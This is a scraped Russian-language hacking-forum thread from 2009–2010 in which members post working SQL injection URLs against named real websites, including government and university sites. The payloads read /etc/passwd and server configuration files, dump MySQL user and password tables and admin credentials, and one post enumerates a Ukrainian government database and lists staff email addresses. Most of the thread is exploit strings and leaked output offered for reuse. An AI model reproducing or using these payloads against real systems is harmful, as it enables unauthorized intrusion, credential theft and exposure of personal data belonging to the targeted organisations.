15.10.2009, 10:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
http://faganmedia.com/profile.php?id='+UNION+SELECT+1,2,3,4,5,load_file( '/etc/passwd'),7,8,9--+
http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/passwd'),user(),version(),6,7,concat(user,0x3a,pas sword),9,10+from+mysql.user--
http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/httpd/conf/httpd.conf'),4,5,6,7,8,9,10--
http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/httpd/php.ini'),4,5,6,7,8,9,10--
root@localhost, 5.0.37
|
|
|
18.10.2009, 14:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
traintheater_db@localhost : 5.0.45
http://www.traintheater.co.il/show.php?id=-14+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x203a 20,user(),version()),11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39--
4.0.26-log : winar@222.124.162.139
http://sekolah-kita.net/info.php?aksi=detail&iden=-12+union+all+select+1,2,3,concat_ws(0x203a20,versi on(),user(),host,user,password,file_priv),5,6,7,8, 9,10+from+mysql.user--
http://sekolah-kita.net/info.php?aksi=detail&iden=-12+union+all+select+1,2,3,load_file(0x2F6574632F70 6173737764),5,6,7,8,9,10--
доступна сессия
|
|
|
|
23.10.2009, 06:51
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Patrik
Сканер сказал, что в http://apg-ua. com/index.php?o=66+and+31337-31337=0+--++ возможна инъекция, но что я не пишу в запрос - в ответ ничего. Помогите, пожалуйста, советом.
Это в "Ваши вопросы по уязвимостям"
http://webcaredesign.dk/viewer.php4?uniq_id=-1010001+union+select+1,2,3,4,5,concat_ws(0x3a,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+--+
User:tastselvwe@80.160.71.24
Database:tastselvweb_dk_db
Version:5.0.27-standard
|
|
|
|
23.10.2009, 08:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
5.0.44-log:MySQLr00t@localhost
http://nasrcityco.com/ar/newsdetails.php?id=-100+union+select+concat_ws(0x3a,version(),user()), 2,concat_ws(0x3a,host,user,password,file_priv),4+f rom+mysql.user
http://nasrcityco.com/ar/newsdetails.php?id=-100+union+select+load_file(0x2F6574632F70617373776 4),2,3,4
|
|
|
|
10.11.2009, 12:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
5.0.81-community-log : jocurius_garrone@localhost
http://www.poze.name/poze.php?id_categ=-100+union+select+concat_ws(0x203a20,version(),user ())--
5.0.18 : root@localhost : localhost : root : Y
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,concat_ws(0x203a20,version(),us er(),host,user,password,file_priv),3,4,5,6,7,8,9+f rom+mysql.user--
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,load_file(0x2f6574632f706173737 764),3,4,5,6,7,8,9
|
|
|
|
12.11.2009, 17:01
|
|
Познающий
Регистрация: 11.10.2009
Сообщений: 33
Провел на форуме:
88588
Репутация:
99
|
|
infofir_seadmin@98.130.0.136:infofir_SE:5.0.41-community-log[/B]
Код:
http://www.senesco.com/newsitem.php?id=-168+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version())--
monkey0_nick@localhost:monkey0_jo151:4.0.27-standard
Код:
http://www.nivb.com/newsitem.php?item=-122+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--
u10118317@lon1-webmysql-2.msh.demon.net:u10118317:4.0.30-log
Код:
http://www.jadeprint.com/newsitem.php?recordID=-12+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8--
alvin@205.178.145.65:alvinsingleton:4.1.22-log
Код:
http://www.alvinsingleton.com/newsitem.php?id=-3+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4--
web108-craven@localhost:web108-craven:5.0.86-community
Код:
http://www.craven-property.com/newsItem.php?id=-51+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7--
blackroc_website@localhost:blackroc_general:5.0.77-community
Код:
http://blackrockspeedway.net/news/newsItem.php?tag=1&year=2009&item=-9+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version())--
alteuser@localhost:alte:4.0.22
Код:
http://www.alte.org/news/newsitem.php?newsID=-197+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5--
njwfadb@208.109.181.105:njwfadb:4.1.22-max-log
Код:
http://www.njworkingfamilies.org/newsItem.php?nwID=-34+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6--
fiddlefolk@localhost:fiddlefolk:5.1.35
Код:
http://www.fiddleworkshop.co.uk/newsitem.php?id=-84+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5--
churchdbuser@localhost:church:5.0.22-Debian_0ubuntu6.06.9-log
Код:
http://www.churchbuyinggroup.co.uk/newsitem.php?news_id=-7+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7--
danielkawczynski@localhost:danielkawczynski:5.0.51 a-3ubuntu5.4
Код:
http://www.daniel4shrewsbury.co.uk/newsitem.php?newsid=-15+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
|
|
|
|
17.11.2009, 18:08
|
|
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275
Репутация:
127
|
|
152 колонки 
PR5 тИЦ40
Код:
http://www.skbcases.com/music/products/proddetail.php?c=85&id=431+and+1=0+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152--
4.0.12-standard-log:skbcases@localhost:skbcases |
|
|
|
28.11.2009, 18:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.ses.gov.ua/?cont=9&news=8&idr=99999999999999'+union+select+1, concat_ws(0x3a,version(),user(),database(),@@versi on_compile_os)+from+information_schema
офiцiйну сторiнка Державної санiтарно-епiдемiологiчної служби м. Києва
версия: 5.0.76
пользователь: sim3_db6@88.214.192.26
БД:sim3_db6
ОС:unknown-linux-gnu
PostgreSQL
фонд державного майна Украины
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+1,2,3,4,5--+&noanons=noanons&all_news=&page=
имя базы данных: spfu_2
версия: PostgreSQL 8.0.8 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
пользователь spfu
узнаем другие базы
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,datname,null,datname,null+f rom+pg_database%20limit+1+offset+1--+&noanons=noanons&all_news=&page=
перебирал параметром оффсет:
spfu_2
template0
template1
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,table_name,null,null,null+f rom+information_schema.tables+limit+1+offset+0--+&noanons=noanons&all_news=&page=
таблицы
admin
answer
applicable_roles
article
check_constraints
circulate_history
...
узнаем колонки
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,column_name,null,null,null+ from+information_schema.columns+where+table_name=$ $admin$$+limit+1+offset+0--+&noanons=noanons&all_news=&page=
с $$ потому что кавыяка не проходит
надо сразу с типами
атрибуты admin:
email
id
inet_request
name
pr
ящики
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,email,null,null,null+from+a dmin+limit+1+offset+0--+&noanons=noanons&all_news=&page=
_no_spam_natalik@ukr.net(Наташа (личный)
_no_spam_press@spfu.gov.ua(Наташа
askh@ukr.net(Олександр Степанович
kroshka@spfu.gov.ua(з приводу плати за оренду майна
marketing@spfu.gov.ua(Департамент маркетингу ФДМУ
rproekt@i.kiev.ua(Радіопроект
Последний раз редактировалось Strilo4ka; 28.11.2009 в 20:24..
|
|
|
|
18.01.2010, 02:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.trt.ru/Stock.php?Part=500+union+select+1,concat_ws%280x3a ,unhex%28hex%28version%28%29%29%29,unhex%28hex%28u ser%28%29%29%29,unhex%28hex%28database%28%29%29%29 %29,3,4,5,6,7,8,9--+
4.1.18:trt@rex.hc.ru:wwwtrtru
тиц 350
выводим в ошибке!
http://www.iling-ran.ru/index.php?part=374+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),0x3a,database(),0x3a,floor(rand(0)*2)) )--
Version: 4.1.25-log:
DB: ilingra6_site
user: ilingra6_bd@localhost
OS: portbld-freebsd6.3
Последний раз редактировалось Strilo4ka; 18.01.2010 в 08:11..
|
|
|
|
18.01.2010, 19:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29,@@version_compile_os%29,3, 4,5,6,7,8
polevivan@localhost:5.0.84-log:libserv  c-linux-gnu polevivan@localhost:5.0.84-log:libserv c-linux-gnu
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+Administrtion
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+tspu1.administrtion
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
